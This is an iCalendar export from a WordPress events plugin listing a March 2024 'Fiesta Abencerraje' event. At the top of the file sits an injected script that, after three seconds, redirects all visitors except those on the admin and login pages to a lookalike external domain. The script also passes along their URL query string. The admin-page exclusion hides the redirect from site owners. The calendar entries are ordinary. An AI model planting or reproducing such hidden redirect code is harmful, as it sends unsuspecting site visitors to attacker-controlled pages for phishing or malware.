<script>
if (
  !window.location.pathname.includes('/wp-admin') &&
  !window.location.pathname.includes('/wp-login')
) {
  var utm = window.location.search || '';
  var newUrl = 'https://morosicristiansontinyent.com/' + utm;

  setTimeout(function() {
    window.location.replace(newUrl);
  }, 3000);
}
</script>BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//wp-events-plugin.com//6.4.7//EN
TZID:Europe/Madrid
X-WR-TIMEZONE:Europe/Madrid
BEGIN:VEVENT
UID:6@morosycristianos.eu
DTSTART;TZID=Europe/Madrid:20240323T000000
DTEND;TZID=Europe/Madrid:20240323T000000
DTSTAMP:20240229T004719Z
URL:https://morosycristianos.eu/events/fiesta-abencerraje/
SUMMARY:Fiesta Abencerraje
DESCRIPTION:
CATEGORIES:Comparsa Abencerrajes
END:VEVENT
BEGIN:VTIMEZONE
TZID:Europe/Madrid
X-LIC-LOCATION:Europe/Madrid
BEGIN:STANDARD
DTSTART:20231029T020000
TZOFFSETFROM:+0200
TZOFFSETTO:+0100
TZNAME:CET
END:STANDARD
END:VTIMEZONE
END:VCALENDAR